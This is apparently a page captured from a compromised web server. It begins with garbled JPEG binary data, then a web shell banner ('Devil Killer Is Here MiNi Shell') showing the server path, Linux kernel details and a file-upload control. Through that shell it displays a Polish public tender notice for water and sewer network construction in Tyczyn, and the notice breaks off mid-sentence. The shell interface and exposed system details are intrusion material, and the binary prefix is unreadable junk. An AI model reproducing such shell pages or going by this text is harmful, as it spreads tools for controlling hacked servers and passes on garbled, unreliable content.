JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/0032254401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa sieci wodociągowo-kanalizacyjnej na terenie gminy Tyczyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej ,,Eko-Strug&#34; sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690473675</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kosciuszki, 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tyczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">tel. 17 22 19 312</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ekostrug.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ekostrug.info/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa sieci wodociągowo-kanalizacyjnej na terenie gminy Tyczyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9630aeec-01f6-429e-a58e-500a5d6479cc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00322544</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Transgraniczny rozwój sieci wodociągowej i kanalizacyjnej - Dobra Woda Tyczyn - Pustomyty&#34;. Zamówienie realizowane jest w ramach programu: Interreg NEXT Polska-Ukraina 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9630aeec-01f6-429e-a58e-500a5d6479cc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3.	Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Marcin Brzychc, e-mail: m.brzychc@ekostrug.pl<br/>4.	Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl/ Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk„Przeglądaj postępowania/konkursy”).<br/>5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>6.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>7.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny<br/>z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>8.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej,<br/>w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>9.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b.	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>10.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym<br/>i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula RODO jest zawarta w SWZ (rozdział II)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula RODO jest zawarta w SWZ ( rozdział II)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP1</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres prac obejmuje:<br/>o	budowę i przebudowę sieci wodociągowej z rur PE100 SDR17 PN10 ( lub równoważną), o średnicy 63-110mm i długości 1717m wraz z uzbrojeniem (żeliwne zasuwy odcinające, hydranty).<br/>o	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1A do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111240-2 - Roboty w zakresie odwadniania gruntu</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45243600-8 - Roboty budowlane w zakresie ścianek szczelnych</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45232150-8 - Roboty w zakresie rurociągów do przesyłu wody</p> <p class="mb-0">45232152-2 - Roboty budowlane w zakresie przepompowni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych wyłącznie na podstawie poniższych kryteriów oceny ofert.<br/>2.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert w każdej części zamówienia:<br/>1)	Cena (koszt) „C” – waga kryterium 60%=60 pkt<br/>2)	Okres Gwarancji i Rękojmi „GR” – waga kryterium 35 %= 35 pkt<br/>3)	Zatrudnienie osób defaworyzowanych „DF” – waga kryterium 5%= 5 pkt<br/>3.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Kryterium Cena (koszt) „C”:<br/>Kryterium „Cena&#34; będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu Oferty. Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C=(Cmin / Coferta) * 60 pkt, gdzie:<br/>C oznacza ilość punktów jakie otrzyma badana oferta za kryterium „C”,<br/>Cmin oznacza najniższą cenę brutto wśród ofert niepodlegających odrzuceniu,<br/>Coferta oznacza cenę brutto badanej oferty.<br/><br/><br/>2)	Kryterium Okres Gwarancji i Rękojmi „GR”:<br/>Kryterium „Okres Gwarancji i Rękojmi” będzie rozpatrywane na podstawie długości terminu okresu gwarancji i rękojmi na wykonane roboty budowlane i zastosowane urządzenia i materiały będące przedmiotem zamówienia w tym wbudowane wyroby i urządzenia, zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Minimalny wymagany okres gwarancji i rękojmi wynosi 36 miesięcy, maksymalny 60 miesięcy. Przy zaoferowaniu okresu 36 miesięcy Wykonawcy zostanie przyznane 0 pkt. Wykonawca może zaoferować okres w pełnych miesiącach, tj.: 36,37,38, ……60 miesięcy. Jeżeli Wykonawca zaproponuje okres gwarancji i rękojmi dłuższy niż 60 miesięcy to do oceny ofert zostanie przyjęty okres 60 miesięcy, natomiast w umowie zostanie uwzględniony okres gwarancji i rękojmi podany przez Wykonawcę w ofercie. W przypadku gdy Wykonawca zaoferuje okres gwarancji i rękojmi krótszy niż 36 miesięcy lub żadnego to do oceny ofert zostanie przyjęty okres 36 miesięcy i taki zostanie wpisany w umowie z Wykonawcą.<br/>W tym kryterium można uzyskać maksymalnie 35 pkt. Zamawiający ofercie z okresem gwarancji i rękojmi 60 miesięcy przyzna 35 pkt a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>R = (Roferty-36 )/(Rmax-36 )*35 pkt,<br/>gdzie: R oznacza ilość punktów jakie otrzyma badana ofert<br/>Roferty oznacza wartość okresu gwarancji i rękojmi podaną w badanej ofercie, Rmax najwyższą wartość okresu gwarancji i rękojmi zaoferowaną w postępowaniu.<br/><br/>3)	Zatrudnienie osób defaworyzowanych „DF”:<br/><br/>Zamawiający przyzna – 5 pkt za zadeklarowanie skierowania do realizacji przedmiotu zamówienia osoby z katalogu tzw. „osób defaworyzowanych” wymienionych w art. 94 ust. 1 pkt 1), 2), 3), 7) i 9) ustawy Pzp przez okres co najmniej 3 miesięcy. Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularz oferty.<br/>W przypadku braku zadeklarowania realizacji usługi przez osoby defarozyzowane z katalogu osób wymienionego powyżej, Wykonawca otrzyma w tym kryterium 0 pkt.<br/><br/>4.	Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione<br/>w niniejszej SWZ warunki udziału w postępowaniu oraz uzyska łącznie największą liczbę punktów (P) stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + GR + DF<br/>gdzie:	P – łączna liczba punktów<br/>C - liczba punktów przyznana ofercie ocenianej w kryterium Cena<br/>GR - liczba punktów przyznana ofercie ocenianej w kryterium Okres gwarancji i rękojmi<br/>DF – liczba punktów przyznana ofercie ocenianej w kryterium Zatrudnienie osób defaworyzowanych</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji i Rękojmi „GR”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób defaworyzowanych „DF”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.2.	CZĘŚĆ 2: BUDOWA SIECI WODOCIĄGOWEJ W MIEJSCOWOŚCI BOREK STARY - PUSTKI W GMINIE TYCZYN<br/>Zakres prac obejmuje:<br/>o	budowę sieci wodociągowej z rur PE100 SDR17 PN10 ( lub równoważną), o średnicy 40-160mm i długości 2618m wraz z uzbrojeniem – (żeliwne zasuwy odcinające, hydranty).<br/>o	budowę hydroforni wody w kontenerze naziemnym wraz z infrastrukturą towarzyszącą (utwardzenie terenu, ogrodzenie i policznikowe zasilanie elektryczne).<br/>o	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1B do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111240-2 - Roboty w zakresie odwadniania gruntu</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45243600-8 - Roboty budowlane w zakresie ścianek szczelnych</p> <p class="mb-0">45232423-3 - Roboty budowlane w zakresie przepompowni ścieków</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45232150-8 - Roboty w zakresie rurociągów do przesyłu wody</p> <p class="mb-0">45232152-2 - Roboty budowlane w zakresie przepompowni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych wyłącznie na podstawie poniższych kryteriów oceny ofert.<br/>2.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert w każdej części zamówienia:<br/>1)	Cena (koszt) „C” – waga kryterium 60%=60 pkt<br/>2)	Okres Gwarancji i Rękojmi „GR” – waga kryterium 35 %= 35 pkt<br/>3)	Zatrudnienie osób defaworyzowanych „DF” – waga kryterium 5%= 5 pkt<br/>3.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Kryterium Cena (koszt) „C”:<br/>Kryterium „Cena&#34; będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu Oferty. Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Zamawiający ofercie o najniższej cenie przyzna 60 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/>C=(Cmin / Coferta) * 60 pkt, gdzie:<br/>C oznacza ilość punktów jakie otrzyma badana oferta za kryterium „C”,<br/>Cmin oznacza najniższą cenę brutto wśród ofert niepodlegających odrzuceniu,<br/>Coferta oznacza cenę brutto badanej oferty.<br/><br/><br/>2)	Kryterium Okres Gwarancji i Rękojmi „GR”:<br/>Kryterium „Okres Gwarancji i Rękojmi” będzie rozpatrywane na podstawie długości terminu okresu gwarancji i rękojmi na wykonane roboty budowlane i zastosowane urządzenia i materiały będące przedmiotem zamówienia w tym wbudowane wyroby i urządzenia, zadeklarowanego przez Wykonawcę w Formularzu oferty.<br/>Minimalny wymagany okres gwarancji i rękojmi wynosi 36 miesięcy, maksymalny 60 miesięcy. Przy zaoferowaniu okresu 36 miesięcy Wykonawcy zostanie przyznane 0 pkt. Wykonawca może zaoferować okres w pełnych miesiącach, tj.: 36,37,38, ……60 miesięcy. Jeżeli Wykonawca zaproponuje okres gwarancji i rękojmi dłuższy niż 60 miesięcy to do oceny ofert zostanie przyjęty okres 60 miesięcy, natomiast w umowie zostanie uwzględniony okres gwarancji i rękojmi podany przez Wykonawcę w ofercie. W przypadku gdy Wykonawca zaoferuje okres gwarancji i rękojmi krótszy niż 36 miesięcy lub żadnego to do oceny ofert zostanie przyjęty okres 36 miesięcy i taki zostanie wpisany w umowie z Wykonawcą.<br/>W tym kryterium można uzyskać maksymalnie 35 pkt. Zamawiający ofercie z okresem gwarancji i rękojmi 60 miesięcy przyzna 35 pkt a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według 